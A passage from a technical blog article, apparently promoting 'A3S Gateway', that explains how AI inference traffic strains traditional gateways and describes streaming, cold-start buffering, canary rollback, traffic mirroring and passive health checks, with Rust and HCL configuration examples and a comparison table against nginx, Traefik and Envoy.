&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="nf"&gt;.body&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;body_bytes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is an architectural choice, not a configuration option.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Fault Line 2: The Backend May Not Exist Yet
&lt;/h2&gt;

&lt;p&gt;At 3 AM, no users are accessing your LLM service. Kubernetes HPA scales the GPU instances down to zero — because keeping one A100 on standby all day costs roughly $1,800 extra per month.&lt;/p&gt;

&lt;p&gt;At 9 AM, the first user opens a chat window, types a message, and hits send.&lt;/p&gt;

&lt;p&gt;When this request reaches the gateway, how many healthy backend instances are there? &lt;strong&gt;Zero.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;What does nginx return? &lt;code&gt;502 Bad Gateway&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;What does the user do? Refresh, try again, another 502. If it is an internal enterprise tool, they go to Slack and ask "is the service down?" If it is a consumer product, they have probably already left.&lt;/p&gt;

&lt;p&gt;The root cause is not in the Kubernetes configuration or the HPA policy — it is in how the gateway handles the fact that the backend does not exist.&lt;/p&gt;

&lt;p&gt;The mental model of a traditional gateway is: &lt;strong&gt;the backend is always there&lt;/strong&gt;. The gateway is a traffic mover, not a scheduling center. When the backend is absent, the only option is to error.&lt;/p&gt;

&lt;p&gt;AI services need a different mental model: &lt;strong&gt;requests can wait&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Not indefinitely — you need a reasonable timeout and queue depth. But during model startup (typically 30–60 seconds), requests should queue in memory rather than be dropped immediately. This pattern is called &lt;strong&gt;cold-start buffering&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User request (09:00:00)
    ↓
Gateway: detects zero backends → triggers scale-up → request enters memory queue
    ↓
Kubernetes brings up GPU instance (09:00:45)
    ↓
Instance passes health check (09:01:00)
    ↓
Gateway dequeues request → sends to backend → user receives first token at 09:01:03
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The user experiences 63 seconds of "thinking", not a 502 error. That is a world of difference in user experience.&lt;/p&gt;

&lt;p&gt;This capability requires the gateway to be aware of the autoscaling system — it must know when to trigger scale-up, when the backend is ready, and how to replay queued requests. These are things nginx was never designed to handle.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Fault Line 3: You Never Know If the New Model Got Dumber
&lt;/h2&gt;

&lt;p&gt;Software deployment has one saving grace: &lt;strong&gt;code is static and can be fully tested&lt;/strong&gt;. You run unit tests, integration tests, and end-to-end tests in CI. If they all pass, you have reason to believe the deployment is safe.&lt;/p&gt;

&lt;p&gt;Models do not have this saving grace.&lt;/p&gt;

&lt;p&gt;You can have an eval suite that validates accuracy improved from 87% to 89% across 1,000 questions. But real user questions follow a long-tail distribution — how much of that tail does your eval cover? When users ask questions in their own language and their own context, what does the new model do?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No static test can answer this question.&lt;/strong&gt; The only answer lives in real traffic.&lt;/p&gt;

&lt;p&gt;This is why AI teams need &lt;strong&gt;canary releases&lt;/strong&gt; — not the blue-green deployments of Web development where new and old code run the same logic, but genuinely routing a fraction of real user requests to the new model and observing its behavior in the wild.&lt;/p&gt;

&lt;p&gt;But canary releases are dangerous on their own, unless paired with &lt;strong&gt;automatic rollback&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Deploying v2 (new model):
  Minute 1: v1 gets 98% traffic, v2 gets 2%
    → v2 error rate: 0.8% (normal), latency: 1.2s (normal)
  Minute 2: v1 gets 90%, v2 gets 10%
    → v2 error rate: 1.1% (normal), latency: 1.3s (normal)
  Minute 3: v1 gets 80%, v2 gets 20%
    → v2 error rate: 8.7% ← exceeds threshold of 5%
    → Auto-rollback: v1 gets 100% traffic, v2 taken offline
    → Alert sent to on-call
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This capability requires the gateway to do version-aware traffic splitting, metric aggregation, and threshold evaluation at the traffic layer — something that can never be implemented with nginx config files.&lt;/p&gt;
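The decision logic described above can be sketched as a small function; names such as `RolloutDecision` and `RevisionMetrics` are illustrative, not A3S Gateway's actual API:

```rust
// Hypothetical sketch of a per-version rollout decision, based on the
// thresholds in the example (5% error rate, 5s p99 latency).

#[derive(Debug, PartialEq)]
enum RolloutDecision {
    Advance,  // promote the canary to the next traffic step
    Hold,     // not enough data yet, keep the current split
    Rollback, // shift 100% back to the stable version
}

struct RevisionMetrics {
    requests: u64,
    errors: u64,
    p99_latency_ms: u64,
}

fn evaluate_canary(
    m: &RevisionMetrics,
    error_rate_threshold: f64,
    latency_threshold_ms: u64,
    min_sample: u64,
) -> RolloutDecision {
    // Not enough traffic yet: keep the current split and wait for data.
    if m.requests < min_sample {
        return RolloutDecision::Hold;
    }
    let error_rate = m.errors as f64 / m.requests as f64;
    if error_rate > error_rate_threshold || m.p99_latency_ms > latency_threshold_ms {
        RolloutDecision::Rollback
    } else {
        RolloutDecision::Advance
    }
}

fn main() {
    // Minute 3 from the timeline: 8.7% error rate against a 5% threshold.
    let minute3 = RevisionMetrics { requests: 1000, errors: 87, p99_latency_ms: 1300 };
    assert_eq!(evaluate_canary(&minute3, 0.05, 5000, 100), RolloutDecision::Rollback);
}
```

The key design point is that this loop runs on metrics the gateway already has per revision, which is why the decision can close at the traffic layer.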

&lt;p&gt;There is also an earlier validation technique: &lt;strong&gt;traffic mirroring&lt;/strong&gt;. Before routing any traffic to the new model, copy 5% of real requests and send them to it, but only return the primary model's response to users. The new model's responses are discarded, but you can log them for offline analysis — how does it perform on real traffic? Where does it diverge from the primary model?&lt;/p&gt;

&lt;p&gt;This is the only way to validate new model quality under "zero-risk" conditions.&lt;/p&gt;
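The sampling half of mirroring can be sketched as a deterministic counter-based sampler; in the real gateway the selected copy would then be sent asynchronously (fire-and-forget) so the primary path never waits on it. `MirrorSampler` is an illustrative name, not A3S Gateway's API:

```rust
// Deterministic sampler: marks N% of requests for the shadow copy.
struct MirrorSampler {
    percentage: u32, // 0..=100
    counter: u32,
}

impl MirrorSampler {
    fn new(percentage: u32) -> Self {
        Self { percentage, counter: 0 }
    }

    /// Returns true when this request should also be copied to the shadow backend.
    fn should_mirror(&mut self) -> bool {
        let slot = self.counter;
        self.counter = (self.counter + 1) % 100;
        slot < self.percentage
    }
}

fn main() {
    let mut sampler = MirrorSampler::new(5);
    let mirrored = (0..200).filter(|_| sampler.should_mirror()).count();
    assert_eq!(mirrored, 10); // exactly 5% of 200 requests
}
```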




&lt;h2&gt;
  
  
  5. Fault Line 4: Connections Are Not Disposable
&lt;/h2&gt;

&lt;p&gt;The lifecycle of a traditional HTTP API:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client sends request → Server processes → Returns response → Connection closes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each request is independent. Connections are short-lived. The gateway is a stateless router.&lt;/p&gt;

&lt;p&gt;AI application connections take different forms:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Conversational AI&lt;/strong&gt;: A conversation between a user and a model can last tens of minutes. If implemented over HTTP, each turn is an independent request — that is fine. But if using WebSocket — because you need bidirectional push, such as letting users send a "stop" command while the model is still generating — the gateway needs to maintain the state of this long-lived connection, not treat it as a plain TCP stream after the handshake.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Streaming Agents&lt;/strong&gt;: An AI agent may continuously push progress updates to the client while executing a task. This is not request-response; it is an event stream that lasts minutes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-time Voice&lt;/strong&gt;: Voice AI requires bidirectional low-latency streams — upstream audio while the user speaks, downstream audio as the model outputs. This is WebSocket or QUIC, not HTTP.&lt;/p&gt;

&lt;p&gt;Traditional gateways treat WebSocket as a special case that needs to be "supported". But in AI applications, persistent connections are the norm, and short request-response cycles are the exception.&lt;/p&gt;
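Before forwarding a bidirectional stream, a gateway first has to recognize the upgrade. A minimal sketch of that check, with header handling simplified to (name, value) pairs for illustration:

```rust
// Detect a WebSocket upgrade request from its headers, the kind of check a
// gateway runs before switching to bidirectional stream forwarding.
fn is_websocket_upgrade(headers: &[(&str, &str)]) -> bool {
    let get = |name: &str| {
        headers
            .iter()
            .find(|(k, _)| k.eq_ignore_ascii_case(name))
            .map(|(_, v)| *v)
    };
    // RFC 6455: Connection must contain "upgrade" and Upgrade must be "websocket".
    let connection_ok = get("connection")
        .map_or(false, |v| v.to_ascii_lowercase().contains("upgrade"));
    let upgrade_ok = get("upgrade").map_or(false, |v| v.eq_ignore_ascii_case("websocket"));
    connection_ok && upgrade_ok
}

fn main() {
    assert!(is_websocket_upgrade(&[("Connection", "Upgrade"), ("Upgrade", "websocket")]));
    assert!(!is_websocket_upgrade(&[("Content-Type", "application/json")]));
}
```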




&lt;h2&gt;
  
  
  6. Fault Line 5: Inference Fails Differently Than HTTP 500
&lt;/h2&gt;

&lt;p&gt;A Web API typically fails because:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The database went down&lt;/li&gt;
&lt;li&gt;Code threw an exception&lt;/li&gt;
&lt;li&gt;A dependency service timed out&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These failures are &lt;strong&gt;fast&lt;/strong&gt;: requests fail within milliseconds, and the gateway's timeout and retry policies can handle them.&lt;/p&gt;

&lt;p&gt;AI inference failure modes are completely different:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Out-of-memory (OOM)&lt;/strong&gt;: The model exhausts GPU memory while processing an especially long context. The request does not fail immediately — it may first slow down (GPU starts swapping), then return an empty response or 500 after 30 seconds.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output degeneration&lt;/strong&gt;: The model starts generating gibberish or infinitely repeating content. From an HTTP perspective, this is a successful 200 response — but it is harmful.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Inference timeout&lt;/strong&gt;: A complex inference request may legitimately take 2 minutes, but sometimes gets stuck in a loop and never finishes. The gateway's timeout needs to distinguish between "normally slow requests" and "stuck requests".&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This means the gateway's health judgment cannot rely solely on HTTP status codes. &lt;strong&gt;Passive health checks&lt;/strong&gt; (judging backend health based on the actual success rate of real requests) reflect the true state of AI backends better than active &lt;code&gt;/health&lt;/code&gt; probes.&lt;/p&gt;

&lt;p&gt;When a backend starts frequently experiencing OOM or timeouts, the gateway needs to automatically reduce traffic sent to that instance, or even temporarily remove it from the load balancing pool — not waiting for a health check to fail, but based on real-time error rates and latency.&lt;/p&gt;
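A sketch of per-instance passive health tracking under a simple policy (consecutive failures evict the instance, consecutive successes readmit it); the thresholds and the `PassiveHealth` name are illustrative, not the gateway's actual implementation:

```rust
// Passive health state for a single backend instance.
struct PassiveHealth {
    consecutive_failures: u32,
    consecutive_successes: u32,
    healthy: bool,
    fail_threshold: u32,
    success_threshold: u32,
}

impl PassiveHealth {
    fn new(fail_threshold: u32, success_threshold: u32) -> Self {
        Self {
            consecutive_failures: 0,
            consecutive_successes: 0,
            healthy: true,
            fail_threshold,
            success_threshold,
        }
    }

    /// Record the outcome of a real request (OOM, timeout, and 5xx all count as failures).
    fn record(&mut self, success: bool) {
        if success {
            self.consecutive_successes += 1;
            self.consecutive_failures = 0;
            if !self.healthy && self.consecutive_successes >= self.success_threshold {
                self.healthy = true; // instance rejoins the load balancing pool
            }
        } else {
            self.consecutive_failures += 1;
            self.consecutive_successes = 0;
            if self.healthy && self.consecutive_failures >= self.fail_threshold {
                self.healthy = false; // temporarily removed from the pool
            }
        }
    }
}

fn main() {
    let mut h = PassiveHealth::new(5, 2);
    for _ in 0..5 { h.record(false); }
    assert!(!h.healthy); // 5 consecutive failures: evicted
    h.record(true);
    h.record(true);
    assert!(h.healthy); // 2 consecutive successes: readmitted
}
```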




&lt;h2&gt;
  
  
  7. Redesigning: What an AI Traffic Layer Needs
&lt;/h2&gt;

&lt;p&gt;Putting the five fault lines together, an AI-native gateway needs to address these five things by design:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Zero-buffer streaming&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not "supporting SSE", but treating streams as a first-class citizen at the memory model level. Every byte is forwarded the instant it arrives from upstream, without passing through any local buffer. This requires the proxy layer's underlying implementation to use async I/O and zero-copy forwarding.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cold-start request buffering&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The gateway must know the current replica count of the backend, trigger scale-up when replicas are zero, and place requests in a memory queue. When replicas are ready, queued requests must be replayed in the correct order, carrying the original timeout deadline (a request that has already waited 30 seconds should not get a full inference timeout on top of that).&lt;/p&gt;
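A deadline-carrying buffer like this can be sketched in a few lines. The `RequestBuffer` name matches the one mentioned later in this article, but the fields and methods here are illustrative, not A3S Gateway's actual code:

```rust
use std::collections::VecDeque;
use std::time::{Duration, Instant};

struct BufferedRequest {
    id: u64,
    deadline: Instant, // set once at arrival; queue time counts against it
}

struct RequestBuffer {
    queue: VecDeque<BufferedRequest>,
    capacity: usize,
}

impl RequestBuffer {
    fn new(capacity: usize) -> Self {
        Self { queue: VecDeque::new(), capacity }
    }

    /// Enqueue a request; returns false when the buffer is full
    /// (the caller should fail fast rather than queue unboundedly).
    fn enqueue(&mut self, id: u64, timeout: Duration) -> bool {
        if self.queue.len() >= self.capacity {
            return false;
        }
        self.queue.push_back(BufferedRequest { id, deadline: Instant::now() + timeout });
        true
    }

    /// Once a replica passes its health check, replay requests in arrival
    /// order, dropping any whose deadline expired while waiting.
    fn drain_ready(&mut self, now: Instant) -> Vec<u64> {
        let mut ready = Vec::new();
        while let Some(req) = self.queue.pop_front() {
            if req.deadline > now {
                ready.push(req.id);
            }
        }
        ready
    }
}

fn main() {
    let mut buf = RequestBuffer::new(2);
    assert!(buf.enqueue(1, Duration::from_secs(60)));
    assert!(buf.enqueue(2, Duration::from_secs(60)));
    assert!(!buf.enqueue(3, Duration::from_secs(60))); // buffer full
    assert_eq!(buf.drain_ready(Instant::now()), vec![1, 2]); // FIFO replay
}
```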

&lt;p&gt;&lt;strong&gt;Version-aware traffic splitting with automatic rollback&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The gateway needs to maintain independent metrics per backend version (error rate, latency percentiles), and decide whether to advance, pause, or roll back based on configured thresholds. This decision loop must close inside the gateway, without depending on external system coordination.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Persistent connections as first-class citizens&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;WebSocket handshakes, protocol upgrades, bidirectional stream forwarding — these must use the same efficient code paths as HTTP proxying, not be hacked onto the back of an HTTP proxy.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Passive health management based on real-time behavior&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Active probes plus passive error rate tracking — both are required. When an instance's error rate exceeds a threshold over the past 60 seconds, it should be temporarily removed from the load balancing pool until the error rate recovers.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. How A3S Gateway Addresses the Five Fault Lines
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Zero-Buffer SSE Forwarding
&lt;/h3&gt;

&lt;p&gt;A3S Gateway uses a dedicated streaming client for streaming requests, based on &lt;code&gt;reqwest&lt;/code&gt;'s streaming response interface, with &lt;code&gt;tcp_nodelay&lt;/code&gt; and a 90-second connection pool keepalive:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// When an SSE/streaming request is detected, switch to the zero-buffer path&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;is_sse&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;is_streaming_request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="nf"&gt;.headers&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;is_sse&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// streaming_client does not accumulate the response body&lt;/span&gt;
    &lt;span class="c1"&gt;// each chunk is forwarded as it arrives from upstream&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;stream_response&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;streaming_client&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;backend&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every token travels from model output to client receipt with no buffering layer in between.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cold-Start Request Buffering
&lt;/h3&gt;

&lt;p&gt;When &lt;code&gt;min_replicas = 0&lt;/code&gt; and the live replica count has dropped to zero, the gateway places incoming requests in a bounded queue (&lt;code&gt;RequestBuffer&lt;/code&gt;), triggers scale-up, waits for a replica to pass health checks, and then replays the queued requests:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"llm-backend"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;scaling&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;min_replicas&lt;/span&gt;          &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;      &lt;span class="c1"&gt;# allow scale-to-zero&lt;/span&gt;
    &lt;span class="nx"&gt;max_replicas&lt;/span&gt;          &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;
    &lt;span class="nx"&gt;container_concurrency&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;     &lt;span class="c1"&gt;# max 10 concurrent requests per replica&lt;/span&gt;
    &lt;span class="nx"&gt;buffer_enabled&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# enable cold-start buffering&lt;/span&gt;
    &lt;span class="nx"&gt;executor&lt;/span&gt;              &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"box"&lt;/span&gt;  &lt;span class="c1"&gt;# use A3S Box to manage replicas&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Scale-up triggering uses Knative's formula:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;desired_replicas = ceil( (in_flight + queue_depth) / (container_concurrency x target_utilization) )
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
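The formula translates directly into code. A sketch under the stated formula (names mirror the config fields, but this is not the gateway's actual implementation):

```rust
// Knative-style scale-up target, capped by max_replicas.
fn desired_replicas(
    in_flight: u32,
    queue_depth: u32,
    container_concurrency: u32,
    target_utilization: f64,
    max_replicas: u32,
) -> u32 {
    let effective_capacity = container_concurrency as f64 * target_utilization;
    let raw = ((in_flight + queue_depth) as f64 / effective_capacity).ceil() as u32;
    raw.min(max_replicas)
}

fn main() {
    // One queued request against a scaled-to-zero service brings up 1 replica.
    assert_eq!(desired_replicas(0, 1, 10, 0.7, 4), 1);
    // Heavy load (ceil(40 / 7) = 6) is capped by max_replicas.
    assert_eq!(desired_replicas(30, 10, 10, 0.7, 4), 4);
}
```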



&lt;h3&gt;
  
  
  Version Traffic Splitting and Automatic Rollback
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"llm-service"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;revisions&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;traffic_percent&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;95&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;servers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[{&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"http://v1:8080"&lt;/span&gt; &lt;span class="p"&gt;}]&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"v2"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;traffic_percent&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="nx"&gt;servers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[{&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"http://v2:8080"&lt;/span&gt; &lt;span class="p"&gt;}]&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;]&lt;/span&gt;

  &lt;span class="nx"&gt;rollout&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;from&lt;/span&gt;                 &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"v1"&lt;/span&gt;
    &lt;span class="nx"&gt;to&lt;/span&gt;                   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"v2"&lt;/span&gt;
    &lt;span class="nx"&gt;step_percent&lt;/span&gt;         &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;          &lt;span class="c1"&gt;# increase by 10% per step&lt;/span&gt;
    &lt;span class="nx"&gt;step_interval_secs&lt;/span&gt;   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt;          &lt;span class="c1"&gt;# one step every 60 seconds&lt;/span&gt;
    &lt;span class="nx"&gt;error_rate_threshold&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;0.05&lt;/span&gt;        &lt;span class="c1"&gt;# rollback if error rate exceeds 5%&lt;/span&gt;
    &lt;span class="nx"&gt;latency_threshold_ms&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;5000&lt;/span&gt;        &lt;span class="c1"&gt;# rollback if p99 exceeds 5s&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Traffic splitting and rollback decisions close inside the gateway, without depending on an external control plane.&lt;/p&gt;

&lt;h3&gt;
  
  
  Traffic Mirroring
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"llm-service"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;mirror&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;service&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"llm-v2-shadow"&lt;/span&gt;  &lt;span class="c1"&gt;# shadow backend&lt;/span&gt;
    &lt;span class="nx"&gt;percentage&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;               &lt;span class="c1"&gt;# copy 10% of real requests&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="c1"&gt;# Mirroring is fire-and-forget:&lt;/span&gt;
  &lt;span class="c1"&gt;# - does not wait for the shadow backend response&lt;/span&gt;
  &lt;span class="c1"&gt;# - does not expose shadow backend errors to users&lt;/span&gt;
  &lt;span class="c1"&gt;# - mirror requests are sent asynchronously, no impact on primary path latency&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Passive Health Management
&lt;/h3&gt;

&lt;p&gt;Each backend instance has an independent error rate tracker. When an instance's error rate exceeds a threshold within a sliding window, it is marked unhealthy and removed from the load balancing pool. When the error rate recovers, it rejoins:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"llm-service"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;load_balancer&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;strategy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"least-connections"&lt;/span&gt;  &lt;span class="c1"&gt;# actively route to the least-loaded instance&lt;/span&gt;
    &lt;span class="nx"&gt;health_check&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;path&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/health"&lt;/span&gt;
      &lt;span class="nx"&gt;interval&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"10s"&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;# Passive health checks are always on:&lt;/span&gt;
&lt;span class="c1"&gt;# 5 consecutive 5xx or timeouts → instance temporarily removed from load balancing&lt;/span&gt;
&lt;span class="c1"&gt;# 2 consecutive successes → instance rejoins&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  9. A Real Comparison With Existing Solutions
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;nginx&lt;/th&gt;
&lt;th&gt;Traefik&lt;/th&gt;
&lt;th&gt;Envoy&lt;/th&gt;
&lt;th&gt;A3S Gateway&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SSE zero-buffer&lt;/td&gt;
&lt;td&gt;Requires manual config, has pitfalls&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Native, architecture-level guarantee&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cold-start request buffering&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version traffic splitting&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Requires Istio&lt;/td&gt;
&lt;td&gt;Yes (built-in)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Automatic rollback&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Requires external system&lt;/td&gt;
&lt;td&gt;Yes (built-in)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Traffic mirroring&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
